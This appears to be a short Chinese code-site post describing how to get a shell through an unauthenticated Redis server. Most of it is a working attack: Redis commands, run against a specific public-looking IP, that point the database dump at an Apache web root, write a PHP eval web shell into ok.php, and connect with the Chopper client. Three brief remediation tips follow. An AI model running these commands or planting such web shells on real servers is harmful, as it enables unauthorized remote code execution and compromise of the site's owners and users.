redis未授权访问getshell

首页 > 代码库 > redis未授权访问getshell

2024-10-17 02:04:39 202人阅读

1、找到站点部署目录

/usr/local/apache/htdocs//3、/3、

2、登陆redis设置目录
redis 61.191.56.216:6379> config set dir /usr/local/apache/htdocs/

OK

redis 61.191.56.216:6379> config set dbfilename ok.php

OK

redis 61.191.56.216:6379> set test "<?php @eval($_POST[123]);?>"

OK

redis 61.191.56.216:6379> save

OK


3、菜刀连接


修复方案：

1）禁止使用 root 权限启动 redis 服务；
2）对 redis 访问启用密码认证，并且添加 IP 访问限制；
3）尽可能不对公网直接开放 SSH 服务。




apt-get install redis-server

redis未授权访问getshell

声明：以上内容来自用户投稿及互联网公开渠道收集整理发布，本网站不拥有所有权，未作人工编辑处理，也不承担相关法律责任，若内容有误或涉及侵权可进行投诉：投诉/举报工作人员会在5个工作日内联系你，一经查实，本站将立刻删除涉嫌侵权内容。

联系
我们

首页 > 代码库 > redis未授权访问getshell

redis未授权访问getshell

看完仍有疑问？有类似问题直接问程序猿